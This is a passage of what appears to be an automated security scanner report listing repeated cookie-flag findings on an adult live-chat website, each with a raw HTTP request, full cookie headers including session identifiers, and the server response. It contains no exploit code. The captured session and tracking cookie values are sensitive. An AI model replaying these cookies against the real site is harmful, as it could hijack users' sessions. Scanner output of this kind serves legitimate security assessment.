GET /live-sex-chats/lesbian/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:57 GMT Connection: close Content-Length: 32831 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/live-sex-video/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:28 GMT Connection: close Content-Length: 24939 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/nude-chat/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:54 GMT Connection: close Content-Length: 23142 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/orgies/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:45 GMT Connection: close Content-Length: 48997 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/pornstars/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:17 GMT Connection: close Content-Length: 265777 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/role-play/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:46 GMT Connection: close Content-Length: 53291 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/sex-show-galleries/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:17 GMT Connection: close Content-Length: 29247 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/sex-show-photos/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:27 GMT Connection: close Content-Length: 25084 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/sex-show-sessions/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:26 GMT Connection: close Content-Length: 25422 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/sex-video-features/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:40 GMT Connection: close Content-Length: 31717 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/shemale-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:14 GMT Connection: close Content-Length: 93218 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/shemale/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; 